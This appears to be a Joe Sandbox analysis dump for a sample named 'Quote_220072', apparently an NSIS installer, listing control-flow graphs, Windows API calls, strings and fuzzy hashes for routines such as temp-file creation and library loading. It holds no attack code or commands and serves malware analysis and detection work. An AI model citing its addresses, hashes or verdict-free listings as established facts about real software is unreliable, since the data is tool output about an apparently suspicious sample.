                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
                                                                              • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                              • API String ID: 4187626192-1149057156
                                                                              • Opcode ID: 90908ed2b1fff3d7c45b9d6734c0443e5caff99512698a5aebad6b02f2870112
                                                                              • Instruction ID: e5fb9ae88836c379eadb94168964a2c41ebb3bf79b6cd8bfde1838e31315b013
                                                                              • Opcode Fuzzy Hash: 90908ed2b1fff3d7c45b9d6734c0443e5caff99512698a5aebad6b02f2870112
                                                                              • Instruction Fuzzy Hash: 0E6115716442159BDB24AB288C40A3B76A4EF99350F11853FF982F72D1EB3CC9258B5E

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 930 405d18-405d24 931 405df5-405df9 930->931 932 405d2a-405d3d 930->932 933 405d49-405d59 lstrlenW 932->933 934 405d3f-405d44 call 405e98 932->934 936 405d5b-405d6a lstrlenW 933->936 937 405d7e 933->937 934->933 938 405d70-405d7c lstrcatW 936->938 939 405df2-405df4 936->939 940 405d83-405d86 937->940 938->940 939->931 941 405d95-405d98 940->941 942 405d88-405d8f SetWindowTextW 940->942 943 405de0-405de2 941->943 944 405d9a-405dde SendMessageW * 3 941->944 942->941 943->939 945 405de4-405dea 943->945 944->943 945->939
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll,?,00000000,?,?), ref: 00405D4A
                                                                              • lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll,?,00000000,?,?), ref: 00405D5C
                                                                              • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll,?,00000000,?,?), ref: 00405D77
                                                                              • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll), ref: 00405D8F
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405DB6
                                                                              • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DD1
                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405DDE
                                                                                • Part of subcall function 00405E98: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll,?,?,?), ref: 0040604E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrcatlstrlen$TextWindow
                                                                              • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll
                                                                              • API String ID: 1759915248-84309663
                                                                              • Opcode ID: b3a3bffc108da763a0d5830401e4444f920c759f89e848b3eba3191ccd966a9d
                                                                              • Instruction ID: eb00d4876afd5f62942919e2a46038e7a2417e41af97232aca8a81e0ace8ac77
                                                                              • Opcode Fuzzy Hash: b3a3bffc108da763a0d5830401e4444f920c759f89e848b3eba3191ccd966a9d
                                                                              • Instruction Fuzzy Hash: C7212672A056206BC310AF598D44E5BBBDCFF95310F04443FF988B3291C7B89D018BAA

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 946 403148-403181 947 403190-4031a4 call 406926 946->947 948 403183-40318b call 403131 946->948 952 403357 947->952 953 4031aa-4031b0 947->953 948->947 956 403359 952->956 954 4031b6-4031e0 GetTickCount 953->954 955 4032f9-4032fb 953->955 960 4032f1-4032f3 954->960 961 4031e6-4031fd call 40311b 954->961 957 403340-403355 call 40311b 955->957 958 4032fd-4032ff 955->958 959 40335a-403364 956->959 957->952 957->960 958->960 962 403301 958->962 960->959 961->952 969 403203-403211 961->969 965 403306-403316 call 40311b 962->965 965->952 972 403318-403328 call 4069e9 965->972 971 40321b-403237 call 406e86 969->971 977 4032f5-4032f7 971->977 978 40323d-40325d GetTickCount 971->978 979 40332a-403338 972->979 980 40333c-40333e 972->980 977->956 981 4032aa-4032b0 978->981 982 40325f-403268 978->982 979->965 985 40333a 979->985 980->956 983 4032b2-4032b4 981->983 984 4032e9-4032eb 981->984 986 40326a-40326c 982->986 987 40326e-4032a6 MulDiv wsprintfW call 405d18 982->987 989 4032b6-4032bf call 4069e9 983->989 990 4032ce-4032d6 983->990 984->960 984->961 985->960 986->981 986->987 987->981 994 4032c4-4032c6 989->994 993 4032da-4032e1 990->993 993->971 995 4032e7 993->995 994->980 996 4032c8-4032cc 994->996 995->960 996->993
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 004031B6
                                                                              • GetTickCount.KERNEL32 ref: 00403248
                                                                              • MulDiv.KERNEL32(?,00000064,?), ref: 00403278
                                                                              • wsprintfW.USER32 ref: 00403289
                                                                                • Part of subcall function 00403131: SetFilePointer.KERNELBASE(?,00000000,00000000,004035B5,?), ref: 0040313F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: CountTick$FilePointerwsprintf
                                                                              • String ID: ... %d%%$<Py
                                                                              • API String ID: 999035486-2352372732
                                                                              • Opcode ID: de52eb9ac16236f3fca6093ce857b7e1a1bc104f410f064c541848c7e306c8f4
                                                                              • Instruction ID: cddf24be581f0244f3449d1f5e961e9f445dbb2a95aafc889e314ca9340d81f7
                                                                              • Opcode Fuzzy Hash: de52eb9ac16236f3fca6093ce857b7e1a1bc104f410f064c541848c7e306c8f4
                                                                              • Instruction Fuzzy Hash: FD519F702083028BD710DF29DE85B2B7BE8AB84756F14093EFC54F22D1DB38DA048B5A

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 997 40617c-40619c GetSystemDirectoryW 998 4061b6 997->998 999 40619e-4061a0 997->999 1001 4061b8 998->1001 999->998 1000 4061a2-4061ad 999->1000 1000->1001 1002 4061af-4061b4 1000->1002 1003 4061bd-4061ea wsprintfW LoadLibraryExW 1001->1003 1002->1003
                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
                                                                              • wsprintfW.USER32 ref: 004061CF
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                              • API String ID: 2200240437-1946221925
                                                                              • Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                                                              • Instruction ID: a4cd9840ceca3203298f5f6208b2692cfaa140b5cc7ad0efff7adaa08ca45ff7
                                                                              • Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                                                              • Instruction Fuzzy Hash: CEF0BB7190161457D710B764DE0DB9A367CEB10304F54447A6646F62C1EB7C9A54C79C

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1004 406a34-406a40 1005 406a41-406a73 GetTickCount GetTempFileNameW 1004->1005 1006 406a75-406a77 1005->1006 1007 406a7e 1005->1007 1006->1005 1008 406a79-406a7c 1006->1008 1009 406a80-406a83 1007->1009 1008->1009
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 00406A50
                                                                              • GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403CB2,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406A6B
                                                                              Strings
                                                                              • a, xrefs: 00406A49
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00406A39
                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406A3D
                                                                              • n, xrefs: 00406A42
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: CountFileNameTempTick
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
                                                                              • API String ID: 1716503409-3489432095
                                                                              • Opcode ID: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                                                              • Instruction ID: 42be8ac81fa96e2418e52fe12c64c606f0e7da939330081f96b146de974569e0
                                                                              • Opcode Fuzzy Hash: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                                                              • Instruction Fuzzy Hash: EDF05E72700208BBEB149F85DD09BEF7769EF91B10F15807BE945BA180E6B05E9487A4

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1010 4068c4-4068da GetModuleHandleA 1011 4068e6-4068ee GetProcAddress 1010->1011 1012 4068dc-4068dd call 40617c 1010->1012 1013 4068f4-4068f6 1011->1013 1015 4068e2-4068e4 1012->1015 1015->1011 1015->1013
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004068EE
                                                                                • Part of subcall function 0040617C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
                                                                                • Part of subcall function 0040617C: wsprintfW.USER32 ref: 004061CF
                                                                                • Part of subcall function 0040617C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                              • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                                                              • API String ID: 2547128583-890815371
                                                                              • Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                                                              • Instruction ID: cca553acf36b1fe6902a80dcde2ed56f94a70d609a724c5234c7087bacb34bc4
                                                                              • Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                                                              • Instruction Fuzzy Hash: FDD02B331022159BC7002F22AE0894F776DEF66350701403BF541F2230EB38C82295FD

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1016 405e1c-405e65 CreateDirectoryW 1017 405e67-405e72 GetLastError 1016->1017 1018 405e8a-405e8c 1016->1018 1019 405e94-405e95 1017->1019 1020 405e74-405e88 SetFileSecurityW 1017->1020 1018->1019 1020->1018 1021 405e8e GetLastError 1020->1021 1021->1019
                                                                              APIs
                                                                              • CreateDirectoryW.KERNELBASE(?,?), ref: 00405E5D
                                                                              • GetLastError.KERNEL32 ref: 00405E67
                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,?), ref: 00405E80
                                                                              • GetLastError.KERNEL32 ref: 00405E8E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                              • String ID:
                                                                              • API String ID: 3449924974-0
                                                                              • Opcode ID: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
                                                                              • Instruction ID: c5276d81fc3706eb17032c67a8bd40c2bbffd7631990a047acf891ba11bc5777
                                                                              • Opcode Fuzzy Hash: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
                                                                              • Instruction Fuzzy Hash: 39011A74D00609DFDB109FA0DA44BAE7BB4EB04315F10443AD949F6190D77886488F99

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1022 406955-406988 call 4062b6 1025 4069c7-4069c9 1022->1025 1026 40698a-4069b9 RegQueryValueExW RegCloseKey 1022->1026 1028 4069cc-4069ce 1025->1028 1026->1025 1027 4069bb-4069bf 1026->1027 1027->1028 1029 4069c1-4069c5 1027->1029 1029->1025 1029->1028
                                                                              APIs
                                                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,?,?,?,?,Call,00000000,00000000,00000002,00405F9C), ref: 0040699C
                                                                              • RegCloseKey.KERNELBASE(?), ref: 004069A7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: CloseQueryValue
                                                                              • String ID: Call
                                                                              • API String ID: 3356406503-1824292864
                                                                              • Opcode ID: 76b6ba2905dba72e0879de14cdf3f2fb9278ac09f103d2f047db2673b29e615b
                                                                              • Instruction ID: 1ae9e56a03760404e91669882a34a602e62d6bc2f034f3a498143100352ea1f7
                                                                              • Opcode Fuzzy Hash: 76b6ba2905dba72e0879de14cdf3f2fb9278ac09f103d2f047db2673b29e615b
                                                                              • Instruction Fuzzy Hash: F6015EB652010AABDF218FA4DD06EEF7BA8EF44354F110136F905E2260E334DA64DB94

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1030 405842-405860 OleInitialize call 4054c6 1032 405865-405867 1030->1032 1033 405894-4058ab call 4054c6 OleUninitialize 1032->1033 1034 405869 1032->1034 1035 40586c-405871 1034->1035 1037 405882-40588a 1035->1037 1038 405873-405880 call 401399 1035->1038 1037->1035 1041 40588c 1037->1041 1038->1037 1043 40588e 1038->1043 1041->1033 1043->1033
                                                                              APIs
                                                                              • OleInitialize.OLE32(00000000), ref: 00405852
                                                                                • Part of subcall function 004054C6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8
                                                                              • OleUninitialize.OLE32(00000404,00000000), ref: 0040589E
                                                                                • Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                                                                • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                                                              Strings
                                                                              • Varighedskravs Setup: Installing, xrefs: 00405842
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
